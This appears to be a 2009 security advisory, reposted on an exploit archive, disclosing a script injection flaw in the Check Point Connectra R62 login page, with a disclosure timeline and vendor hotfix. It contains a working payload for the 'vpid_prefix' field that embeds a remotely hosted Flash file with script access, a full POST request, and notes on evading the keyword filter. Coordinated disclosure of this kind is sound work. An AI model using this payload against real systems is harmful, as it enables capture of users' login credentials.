what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Check Point Connectra Script Injection

Check Point Connectra Script Injection
Posted Sep 21, 2009
Authored by Stefan Friedli | Site scip.ch

Check Point Connectra R62 suffers from a login script injection vulnerability.

tags | exploit
SHA-256 | 973662714d2638504ccc5f296c57e238e0cf445d2393960a6bd2765cd9964e33

Check Point Connectra Script Injection

Change Mirror Download
Check Point Connectra R62 Login Script Injection Vulnerability
scip AG Vulnerability ID 4020 (09/04/2009)
http://www.scip.ch/?vuldb.4020

I. INTRODUCTION

Check Point Connectra is a so-called SSL-VPN solution, which allows
users to access a remote system using a regular web browser.

More information is available on the official product web site at the
following URL[1]:

http://www.checkpoint.com/products/connectra/index.html

II. DESCRIPTION

Stefan Friedli at scip AG (Switzerland) found an input validation error
within the current release, which enabled an attacker to perform various
web-based attacks.

The initial logon script at /Login/Login, that is being used for
unauthenticated users to log in, fails to perform proper input
validation on the data that is being submitted via HTTP POST. While
certain fields are escaped before being sent back to users browser, the
parameter "vpid_prefix" lacks any validation and is therefore vulnerable
to script injection.
Other parts of the application might be affected too.

This vulnerability has been tested on version R62, other versions might
be affected as well.

III. EXPLOITATION

Classic script injection techniques and unexpected input data within a
browser session can be used to exploit these vulnerabilities. The target
application does actually check for certain patterns and prevents an
attacker from using easy exploiting strings containing substrings like
"script", "javascript", "alert" or similar. However, we consider this to
be an imperfect mechanism that is unable to prevent an attack using a
more sophisticated payload. For a selection, you might want to check
RSnakes popular XSS Cheat Sheet[2], which contains several patterns not
being detected by the filter in place, allowing you execute any
arbitrary, externally hosted payload.

We exploited the vulnerability for a customer in order to proof the
possibility to capture usernames and passwords. One of the possibilities
mentioned above is, to embed a remote flash file and grant it the
permission to execute script code.

Vulnerable Variable Value:

vpid_prefix = "><embed/src="http://www.scip.ch/p/s/w/ccs.swf"
allowScriptAccess=always><a name="

--- CUT ---
POST https://TARGET:443/Login/Login HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2)
Gecko/20090729 Firefox/3.5.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://TARGET/Login/Login?LangCode=
Cookie: CheckCookieSupport=1; ICSCookie=***purged***; user_locale=en_US
Content-Type: application/x-www-form-urlencoded
Content-length: 153

loginType=Standard&userName=&vpid_prefix="><embed/src="http://www.scip.c
h/p/s/w/ccs.swf"
allowScriptAccess=always><a name="
&password=&HeightData=1147&Login=Sign+In

--- CUT END ---

Response Snippet:

--- CUT ---
<input type="hidden" id="vpid_prefix" name="vpid_prefix"
value=""><embed/src="http://www.scip.ch/p/s/w/ccs.swf"
allowScriptAccess=always><a name="">
--- CUT END ---

IV. IMPACT

Because non-authenticated parts of the software are affected, this
vulnerability is serious for every secure environment. Non-authenticated
users might be able to exploit this flaw to gain elevated privileges in
the target environment (e.g. extracting sensitive cookie information or
login information) or to perform any other form of web-based attacks.
Due to the fact that the application will often be allowed to make use
of ActiveX, it can also be used as a springboard to inject other
payloads, for example MS09-037[3] or any other vulnerability disclosed
lately, that might be exploited using a web browser.

Because other parts of the application might be affected too - this
could include some second order vulnerabilities - a severe attack
scenario might be possible.

V. DETECTION

Detection of web based attacks requires a specialized web proxy and/or
intrusion detection system. Patterns for such a detection are available
and easy to implement. Usually the mathematical or logical symbols for
less-than (<) and greater-than (>) are required to propose a HTML tag.
In some cases single (') or double quotes (") are required to inject the
code in a given HTML statement. Some implementation of security systems
are looking for well-known attack tags as like <script> and attack
attributes onMouseOver too. However, these are usually not capable of
identifying highly optimized payload.

VI. SOLUTION

Check Point provides a hotfix for the vulnerability which should be
installed on vulnerable systems

VII. VENDOR RESPONSE

Check Point acknowledged the problem and provides a hotfix for the
vulnerability.
Detailed information on the issue, maintained by Check Point, can be
found at:
https://supportcenter.checkpoint.com/supportcenter/portal?solutionid=sk4
2793

VIII. SOURCES

scip AG - Security Consulting Information Process (german)
http://www.scip.ch/

scip AG Vulnerability Database (german)
http://www.scip.ch/?vuldb.4020

IX. DISCLOSURE TIMELINE

2009/09/04 Identification of the vulnerability, Vendor is being
notified.
2009/09/04 Check Point confirms the receipt of the notification
2009/09/04 scip AG confirms status and procedure
2009/09/06 Check Point confirms the existence of the flaw, agrees on the
proposed timeline for coordinated release and announces a hotfix
2009/09/06 scip AG confirms status and procedure
2009/09/16 Check Point states that the hotfix is currently in QA and
will be ready for coordinated release within the next week
2009/09/21 Check Point is ready to release the hotfix and a public
vendor response
2009/09/21 scip AG confirms and coordinates public release of
advisory/vendor response/hotfix

X. CREDITS

The vulnerabilities were discovered by Stefan Friedli.

Stefan Friedli, scip AG, Zuerich, Switzerland
stfr-at-scip.ch
http://www.scip.ch/

A1. BIBLIOGRAPHY

[1] Connectra Official Vendor Information, Check Point
http://www.checkpoint.com/products/connectra/index.html

[2] XSS Cheat Sheet, RSnake
http://ha.ckers.org/xss.html

[3] Microsoft Security Bulletin MS09-037 - Critical, Microsoft
http://www.microsoft.com/technet/security/bulletin/MS09-037.mspx

[4] Check Point Vendor-Response on this issue
https://supportcenter.checkpoint.com/supportcenter/LoginRedirect.jsp?toU
RL=eventSubmit_doGoviewsolutiondetails=%26solutionid=sk42793

A2. LEGAL NOTICES

Copyright (c) 2002-2009 scip AG, Switzerland.

Permission is granted for the re-distribution of this alert. It may not
be edited in any way without permission of scip AG.

The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. There are no
warranties with regard to this information. Neither the author nor the
publisher accepts any liability for any direct, indirect or
consequential loss or damage from use of or reliance on this advisory.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close